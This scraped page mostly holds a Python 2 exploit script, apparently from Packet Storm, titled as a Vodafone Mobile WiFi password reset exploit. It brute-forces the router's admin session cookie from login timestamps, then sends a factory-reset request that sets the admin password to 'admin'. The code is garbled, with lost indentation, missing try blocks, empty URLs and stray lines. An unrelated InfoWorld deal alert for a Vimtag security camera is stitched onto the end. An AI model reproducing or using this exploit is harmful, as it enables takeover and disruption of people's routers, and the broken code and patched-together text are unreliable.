import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process

print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
thread_lock = False
session = ""
def unix_time_millis(dt):
epoch = datetime.utcfromtimestamp(0)
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)


def check_process_output():
print 1

p = process.Process(target=check_process_output)

print a

def crack(queue):
global thread_lock
global session
while True:
if thread_lock:
if not queue.empty():
cookie = queue.get()
headers = 'Referer': '', 'Cookie': "stok=%s" % cookie
req = urllib2.Request(""
% time.time(), None, headers)
result = urllib2.urlopen(req).read()
if json.loads(result)["AuthMode"] != "":
print "[+] Found valid admin session!"
print "[INFO] Terminating other threads ... please wait"
session = cookie
thread_lock = True

def start_threads_with_args(target, n, arg):
thread_pool = []
for n_threads in range(0, n):
thread = Thread(target=target, args=(arg,))
return thread_pool

def start_bruteforce():
global session
global thread_lock
queue = Queue(0)
start_threads_with_args(crack, 15, queue)
print"[!] Trying fast bruteforce..."
for x in range(0, 1000):
if thread_lock:
queue.put("123abc456def789%03d" % x)
while True:
if session != "":
return session
if queue.empty():
print "[!] Trying slow bruteforce..."
for milliseconds in range(0, how_many):
if thread_lock:
queue.put("123abc456def789%s" % (start + milliseconds))
while True:
if session != "":
return session
if queue.empty():
return session
if __name__ == "__main__":
now = datetime.now()
hours = raw_input("How many hours ago admin logged in: ")
minutes = raw_input("How many minutes ago admin logged in: ")
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
start = unix_time_millis(init)
how_many = unix_time_millis(end) - start + 1
print "[+] Starting session bruteforce with 15 threads"
valid_session = ""
valid_session = start_bruteforce()
except KeyboardInterrupt:
print "[-] Exiting.."
thread_lock = True
if valid_session == "":
print "[!] Can't find valid session 🙁 quitting..."
print "[+] Resetting router password to 'admin' , network may be down for a while"
headers = 'Referer': '', 'Cookie': "stok=%s" % valid_session
req = urllib2.Request("",
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
except httplib.BadStatusLine:
print "[!] Password resetted to admin! have fun!"
except Exception:
print "[x] Error during password reset"
print "[-] Can't reset password try manually, your session is: %s" % valid_session

Exploit Files ≈ Packet Storm

wifi security cam

This full-featured camera broadcasts over wifi, allowing you to view live from multiple mobile devices at once. Its footage records to micro SD where it is stored and accessible remotely as well. Remote pan/tilt/zoom, 2-way voice, motion-detection alert, and night vision capabilities are all onboard. This model averages 4 out of 5 stars on Amazon from over 4,100 people (read reviews). Amazon indicates that its typical list price of $ 200 has been reduced 50% to $ 100.

This story, "50% off Vimtag VT-361 Pan&Tilt HD WiFi Video Security Camera with Night Vision - Deal Alert" was originally published by
InfoWorld Security